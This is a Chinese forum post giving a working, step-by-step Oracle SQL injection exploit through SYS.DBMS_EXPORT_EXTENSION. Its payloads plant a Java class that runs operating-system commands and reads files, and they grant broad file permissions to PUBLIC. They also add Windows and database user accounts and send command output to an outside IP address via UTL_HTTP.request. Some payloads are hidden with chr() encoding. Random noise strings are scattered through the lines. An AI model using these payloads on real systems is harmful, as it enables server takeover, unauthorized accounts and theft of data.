以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
6 L. j: `( ?6 w1 C
: A* H# f- _5 I6 T9 J+ l+ w' X /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) - i8 {' J, W. u2 s; X5 w+ H
的形式即可。(用" 'a'|| "是为了让语句返回true值) 0 m0 b* ~4 @( }. y8 U
语句有点长,可能要用post提交。 # o0 y* d! R8 g$ @% i( x
以下是各个步骤:
K& \# C" i, P# k" s1.创建包
8 c8 L0 u7 H9 D6 Q6 x% V4 e通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
6 U: t6 U% A4 _# X0 p( G) F/xxx.jsp?id=1 and '1'<>'a'||( 7 C% k8 i1 c( e
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( k& E9 v6 O7 e2 {
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
1 p0 V2 y) F+ Q: _new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}! e2 ]9 W- ?. I' c
}'''';END;'';END;--','SYS',0,'1',0) from dual
) r% [/ p7 I. N" l) 9 z. Q8 s8 t( C2 M: l
------------------------
y" ]& M- G' C, h2 X如果url有长度限制,可以把readFile()函数块去掉,即:
. x; s! z. [* E/xxx.jsp?id=1 and '1'<>'a'||(
: V f& \3 v$ D1 Q3 X- Cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 M W1 ?0 R+ o3 c$ [8 icreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(/ f# @0 R6 ~3 G$ D" t
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
( [' D* i6 l6 ]. H}'''';END;'';END;--','SYS',0,'1',0) from dual
. f- [8 F5 M) Z" y+ y" h7 F)
- g0 O# C; v4 m0 i1 e7 G6 Z同时把后面步骤 提到的 对readFile()的处理语句去掉。
1 G6 n/ ?% C! Q9 R- ^------------------------------
7 L8 b0 T4 `- M4 A2 X2.赋Java权限
, @: O) Y% F7 U! ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual. R: {5 }" a' T- { q, ~' P
3.创建函数
( w8 R1 K2 X# n6 I8 H& f# nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 g( r- R% z1 q- dcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual- a2 M+ M: v: p9 |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ g; ?' [. V- g( M, o- ^: q
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
5 H# l2 O2 s2 q$ z4.赋public执行函数的权限
9 M# l5 ~# |; H, U) Cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual3 {7 V( `: Z" E2 N9 b1 I2 ], |% \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
3 h9 ^; O5 t+ R* k9 m9 F5.测试上面的几步是否成功
7 {4 {. o1 ~ \: p z/ ]' e. i iand '1'<>'11'||( ; ]' H2 c4 T" L$ ^- I8 M. {
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
# `8 x, O( l7 G! x) & i0 ]) ]; o5 B4 a3 L" E9 t% j
and '1'<>(
* |. D5 Y" I2 R/ h/ {, Pselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 5 r/ ^8 f U, ]5 Q( e
)
; v% O |0 U. @6.执行命令:
! ?6 w9 I5 {2 p: E/xxx.jsp?id=1 and '1'<>(
1 D6 x. E4 h: r0 l/ m9 ]. pselect sys.LinxRunCMD('cmd /c net user linx /add') from dual . V9 B8 d( t' q2 O3 ]9 X8 f
0 h. h& N t. q; U$ Q7 W' L) 5 {% G7 O' G1 |% a. P- E$ h
/xxx.jsp?id=1 and '1'<>( / G3 u6 @3 P6 Q# z) Z i& i
select sys.LinxReadFile('c:/boot.ini') from dual
- R, U# u+ B9 V, l" L- b+ C* L/ Y" Q) Y
)
q& x+ q; i- E$ \+ C: _. [ 5 \' ?% A, C; {; V% Q! X. G! i- z4 K, U
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
) e# E7 W7 A( H. J/ j- ?9 ~如果要查看运行结果可以用 union :
$ o `) z4 t- A4 ]7 c7 m/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual# s! Y! {9 s6 q/ ]" j; S. v$ k
或者UTL_HTTP.request(: 8 J& Q$ G# k# x+ [# I# w
/xxx.jsp?id=1 and '1'<>(
5 {' d1 Z$ W0 \) E0 h, M; y4 g$ kSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
# G9 t3 T6 M0 X)
# B+ e0 x+ L# e( w& M, B5 G% A$ q/xxx.jsp?id=1 and '1'<>( % m# \9 P4 Q# p8 q$ G6 y: M
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
( W1 v: S A3 j( A6 e# n. Z! d)
- Q, z4 H2 @7 M注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
! Q0 K8 M9 D& r2 L--------------------
* }; g: a5 ~8 a7 |2 k$ A6.内部变化 1 w E" n( ^2 L. M) B8 c5 r1 i( R
通过以下命令可以查看all_objects表达改变: . I/ @) N/ _1 Z( K, u( @1 s4 C
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'& |0 H( ~! p& ]4 T* e7 Y7 g
7.删除我们创建的函数
4 o ^1 ~ Y2 A+ q4 q. wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 X$ [" Z2 _4 y" B+ Z2 H( qdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
1 P: u" X$ d, j* ]1 [==================================================== . x2 U- l! c( e
全文结束。谨以此文赠与我的朋友。 5 x% }; ^) W1 F. S9 h
linx
5 q5 _7 l( O* N124829445
9 g) e9 ^- \$ t. S2008.1.12
) S( |9 s! l, t0 |$ [8 D2 r0 J; Jlinyujian@bjfu.edu.cn
5 l/ Y. `3 O* A) N3 ] I6 P: ]====================================================================== ) D0 S% \! s2 u/ I# i" j" w+ A
测试漏洞的另一方法:
" N- Y0 h/ N$ U创建oracle帐号: 8 Q6 n% }% N0 \) R4 R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 r* Z( {$ }( V9 T( }; V8 c
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual' \! x [, r( j a+ Q* s
即:
9 M! b; r/ N7 O" lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
& b4 ~. R3 k0 B# r( j! {chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual - z1 [, v7 q/ x& B- A9 x: h$ a
确定漏洞存在: 1 J5 K8 P- T" o) {8 ?7 i M7 w
1<>(
, W' v$ X2 s" m9 u) b+ ]& B. zselect user_id from all_users where username='LINXSQL'
1 r6 Z7 M( C0 l$ S$ B. i/ t)
: m o; j+ f9 C: [! [/ N% Q给linxsql连接权限: 6 z/ O8 s% U/ k& s% D2 d
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' {. z' Q3 E2 E' L
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
1 V, x. P$ e. M' o8 e3 M删除帐号: 1 ^5 n5 x$ y0 B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
T Z; D- ?, ] o, Y4 kdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
1 M+ N, x9 J$ z" h====================== 9 c( y) o/ h" l5 m8 L
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:2 Y1 B( { ]9 w) _' u' ~6 ~: t
1.jsp?id=1 and '1'<>(
& C2 w4 V& f+ W$ Nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 a& v7 H# `& W* i+ pcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
9 ]& L: B0 l3 k$ n/ ~4 p$ T) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
6 E, t1 ^4 t9 }' i )
: o) h0 ]/ S7 T% B& I
2 Q& `# G% O- [3 T- m" ~: z+ e, f; A/ E" w
3 I9 }( o0 I; w0 i" `( _ |
发表于 2012-12-18 12:21:48
收藏
支持
反对